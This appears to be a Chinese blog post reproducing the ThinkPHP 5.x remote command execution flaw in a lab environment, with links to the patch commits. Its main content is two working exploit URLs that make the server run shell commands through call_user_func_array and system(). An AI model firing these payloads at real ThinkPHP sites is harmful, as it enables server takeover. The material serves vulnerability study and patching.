【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

原創 LYRICBAO 2018-12-12 13:01

0x00復現環境

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠程命令執行漏洞利用(GetShell)

0x01步驟

  1. 點擊start to hack 進入環境頁面 run the project 然後訪問給出的target address
    1.執行系統命令顯示目錄下文件 http://aaa.vsplate.me:52763/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
    【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

  2. 執行phpinfo
    http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

想你所想,發揮創意

0x02漏洞原理分析

待分析

0x03漏洞分析

Thinkphp v5.0.x補丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x補丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

reference

http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Thinkphp3.2訪問Url時去掉模塊

霍比特人666 2018-09-11 08:02:11

網站有漏洞被攻擊篡改了數據該怎麼修復解決

網站安全 2019-01-18 09:28:57

ThinkPHP < 5.0.24 遠程代碼執行高危漏洞 修復方案

crx349 2019-01-12 11:25:55

Thinkphp 與Echarts-php 使用 頂 原

強子啊 2018-12-02 21:04:53

Thinkphp 鏈接 Myssql數據庫

biean1005 2018-09-14 02:27:12

Thinkphp 鏈接 Myssql數據庫

biean1005 2018-09-14 02:27:12

Thinkphp使用PDO方式連接MSSQL2000、sqlserver數據庫的方法,PHP版本是PHP5.2

jsjlhj 2018-09-13 03:04:08

ThinkPHP2.0操作MSSQL獲取數據,出現Incorrect syntax near the keyword 'AS'. 錯誤的解決辦法

jsjlhj 2018-09-13 03:04:07

阿里大魚短信接口 for Thinkphp

悟空幫旅行 2018-09-12 05:26:04

thinkphp 之 validate

fzy_870618 2018-09-11 08:25:50

Thinkphp 生成訂單號小案例

Percy丶 2018-09-11 06:11:39

ms07-029漏洞學習

Owefsad 2018-09-15 02:44:19

ms05-017漏洞原理與復現

Owefsad 2018-09-15 02:44:19

ms03-026漏洞原理與復現

Owefsad 2018-09-15 02:44:19

[漏洞復現] CVE-2017-16995 Ubuntu16.04漏洞復現

陳鑫傑 2018-09-12 04:15:35